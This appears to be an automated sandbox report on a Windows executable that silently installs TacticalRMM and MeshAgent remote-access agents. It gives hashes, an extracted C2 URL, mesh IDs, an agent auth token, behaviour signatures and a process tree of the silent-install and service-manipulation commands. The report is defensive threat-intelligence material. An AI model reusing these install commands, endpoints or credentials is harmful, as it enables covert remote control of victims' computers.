Analysis

  • max time kernel
    135s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted
    18/01/2025, 00:53

General

  • Target

    2025-01-18_8c39f7b61f6b3cff72cd07c1dd90fbad_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe

  • Size

    5.0MB

  • MD5

    8c39f7b61f6b3cff72cd07c1dd90fbad

  • SHA1

    4b1e80bb562ceab0dab23601e4159c861d32331e

  • SHA256

    adf8dd8a9c80862cfc7bea25e10111d38b7d5c3cc1f10acc60bcfaa4a7db8290

  • SHA512

    47723b7bff41cd690374aa3e168cf10e1f2310250db4a507698397cfc4da4c8312e72041adca48190027ea0dcf1480d82922167e1d37513747fec36dd21568fe

  • SSDEEP

    49152:Kkk1lQkvWuVMrb/TcvO90d7HjmAFd4A64nsfJW5B270PGUJ+GSZ05UU4SVaDs1CW:tkvWuVrfz+ZUfVaA6El+erV

Malware Config

Extracted

Family

meshagent

Version

2

Botnet

TacticalRMM

C2

http://mesh.ztn.app:443/agent.ashx

Attributes
  • mesh_id

    0x1AC5A427D36E6A21D10128F481F9AC5A8DA677889ACD69D474A4B30819BCBFF7B979A19A780A3C6E50E3CD3AE57878ED

  • server_id

    58BA8120DEF0E4E89076972F82774D385B0F397F68F98E8BF0EF8B2C63F080982D35511B9CE190622EC6A4316C9AF531

  • wss

    wss://mesh.ztn.app:443/agent.ashx

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Meshagent family
  • Blocklisted process makes network request 4 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 6 IoCs
  • Drops file in Program Files directory 20 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-01-18_8c39f7b61f6b3cff72cd07c1dd90fbad_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-01-18_8c39f7b61f6b3cff72cd07c1dd90fbad_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2692
    • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe
      C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe /VERYSILENT /SUPPRESSMSGBOXES
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2976
      • C:\Users\Admin\AppData\Local\Temp\is-FS67U.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-FS67U.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /SL5="$70196,3660179,825344,C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe" /VERYSILENT /SUPPRESSMSGBOXES
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2732
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:2580
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2688
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrpc
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2556
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrpc
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2564
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net stop tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2572
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalagent
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2672
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalagent
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3064
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:3060
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2184
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1204
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1592
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c taskkill /F /IM tacticalrmm.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2924
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM tacticalrmm.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1980
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          PID:792
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalagent
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:2188
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2252
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalrpc
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:2648
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c tacticalrmm.exe -m installsvc
          4⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1492
          • C:\Program Files\TacticalAgent\tacticalrmm.exe
            tacticalrmm.exe -m installsvc
            5⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2620
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net start tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          PID:832
          • C:\Windows\SysWOW64\net.exe
            net start tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2376
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 start tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2440
    • C:\Program Files\TacticalAgent\tacticalrmm.exe
      "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.ztn.app --client-id 14 --site-id 37 --agent-type workstation --auth c52763ea5e8516c687c06875af1bd779e47c159661b3df56cdcc3c1a649244f4
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2384
      • C:\Program Files\TacticalAgent\meshagent.exe
        "C:\Program Files\TacticalAgent\meshagent.exe" -fullinstall
        3⤵
        • Sets service image path in registry
        • Executes dropped EXE
        • Drops file in Program Files directory
        PID:2436
      • C:\Program Files\Mesh Agent\MeshAgent.exe
        "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
        3⤵
        • Executes dropped EXE
        PID:340
  • C:\Program Files\Mesh Agent\MeshAgent.exe
    "C:\Program Files\Mesh Agent\MeshAgent.exe"
    1⤵
    • Executes dropped EXE
    • Drops file in Program Files directory
    • Modifies data under HKEY_USERS
    PID:1976
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1628
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:524
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1988
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      PID:1984
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      PID:1400
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:2512
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Drops file in Program Files directory
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:2424
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Drops file in Program Files directory
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:1612
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Drops file in Program Files directory
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:2564
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Drops file in Program Files directory
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:2596
  • C:\Program Files\TacticalAgent\tacticalrmm.exe
    "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    PID:1352
    • C:\Program Files\TacticalAgent\tacticalrmm.exe
      "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m checkrunner
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:2616
    • C:\Program Files\Mesh Agent\MeshAgent.exe
      "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
      2⤵
      • Executes dropped EXE
      PID:1128
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass C:\ProgramData\TacticalRMM\1113272193.ps1
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:2756

Downloads

        • C:\Program Files\Mesh Agent\MeshAgent.db

          Filesize

          153KB

        • C:\Program Files\Mesh Agent\MeshAgent.db

          Filesize

          35KB

        • C:\Program Files\TacticalAgent\agent.log

          Filesize

          67B

        • C:\ProgramData\TacticalRMM\1113272193.ps1

          Filesize

          35KB

        • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe

          Filesize

          4.3MB

        • C:\Users\Admin\AppData\Local\Temp\is-FS67U.tmp\tacticalagent-v2.8.0-windows-amd64.tmp

          Filesize

          3.0MB

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

          Filesize

          914B

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

          Filesize

          70KB

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          1KB

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

          Filesize

          252B

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          242B

        • C:\Windows\Temp\CabFF67.tmp

          Filesize

          29KB

        • C:\Windows\Temp\TarA6.tmp

          Filesize

          181KB

        • \Program Files\TacticalAgent\meshagent.exe

          Filesize

          3.3MB

        • \Program Files\TacticalAgent\tacticalrmm.exe

          Filesize

          9.2MB
